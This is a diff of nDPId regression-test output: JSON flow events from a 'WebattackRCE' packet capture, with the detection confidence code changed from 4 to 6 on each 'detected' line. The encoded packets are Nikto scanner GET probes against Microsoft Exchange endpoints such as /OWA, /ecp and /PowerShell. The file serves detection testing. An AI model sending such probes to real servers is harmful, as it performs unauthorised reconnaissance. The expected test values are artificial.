00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 